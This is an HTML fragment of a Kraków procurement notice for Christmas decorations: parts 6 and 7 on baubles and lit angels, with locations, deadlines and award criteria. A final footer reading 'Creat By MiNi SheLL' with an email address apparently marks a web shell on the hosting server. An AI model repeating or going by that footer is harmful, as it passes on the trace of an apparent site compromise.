<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Graficzny projekt dekoracji - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Ustawienie bombek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> WYGLĄD ZEWNĘTRZNY, WYTYCZNE PROJEKTOWE BOMBEK:
-wykonanie stabilnej konstrukcji w kształcie kuli ze ściętą podstawą, 
-konstrukcja wypełniona( np. w formie igliwia) złotym błyszczącym tworzywem sztucznym odpornym na warunki atmosferyczne .
-wykonanie tunelu w konstrukcji tak, aby była możliwość przechodzenia z jednej strony na drugą przez środek bombki
-Wymiary 3m x 3m x 3m
-Dopuszczalna w 2014/2015  kolorystyka  to:
- ciepły żółty (złoty) 
- srebrny
- wyłącznie jako element uzupełniający ciemno-czerwony.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.89.00-6, 45.45.10.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Graficzny projekt dekoracji - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Ustawienie aniołów świetlnych dużych i małych i choinki świetlnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Montaż dużych i małych aniołów świetlnych
Konserwacja i pomalowanie konstrukcji metalowej 8 sztuk dużych  i 4 małych aniołów świetlnych oraz uzupełnienie i wymiana spalonych świateł LED, Montaż i demontaż Aniołów oraz zabudowanie konstrukcji planszami metalowymi na których będzie szkic miasta Krakowa z napisem -Wszystkiego Najlepszego z Okazji Świąt Bożego Narodzenia i Nowego Roku  życzy  Miasto Kraków.
Modernizacja układu oświetlenia wraz z wprowadzeniem nowoczesnych elementów oświetlenia energooszczędnego LED.
Uzupełnienie konstrukcji (wypełnienie)  tworzywem odpornym na warunki atmosferyczne  tak aby poprawić walory estetyczne aniołów widoczne zarówno w dzień jak i w nocy.
Zakres  prac:
1.Zamontowanie kurtyn świetlnych do konstrukcji.
2.Przymocowanie postaci na linach lub  konstrukcji stojącej, gwarantującej bezpieczeństwo, stabilność i odporność na czynniki atmosferyczne.
3.Transport z magazynu.
4.Zamontowanie plansz z życzeniami.
5.Podłączenie do sieci elektrycznej oświetlenia miejskiego.
6.Odłączenie od sieci miejskiej.
7.Demontaż konstrukcji postaci świetlnej i transport do magazynu na terenie miasta Krakowa.
Miejsca montażu: wg wskazań zamawiającego
 -Ilość sztuk 8 dużych aniołów 
- Ilość sztuk 4 małych aniołów
- Ilość sztuk 1 choinka świetlna
LOKALIZACJA DUŻYCH ANIOŁÓW:
-Rondo Barei
-ul. Szpitalna (planty przy wyjściu od dworca)
-Rondo Młyńskie
-Rondo Generała Maczka
-Ronda Kocmyrzowskie
-Rondo Czyżyńskie
-Rondo Mogilskie
-Plac Niepodległości
LOKALIZACJA MAŁYCH ANIOŁÓW:
-Aleja Mickiewicza (skrzyżowanie z ul. Piłsudskiego).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.89.00-6, 45.45.10.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Graficzny projekt dekoracji - 50</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com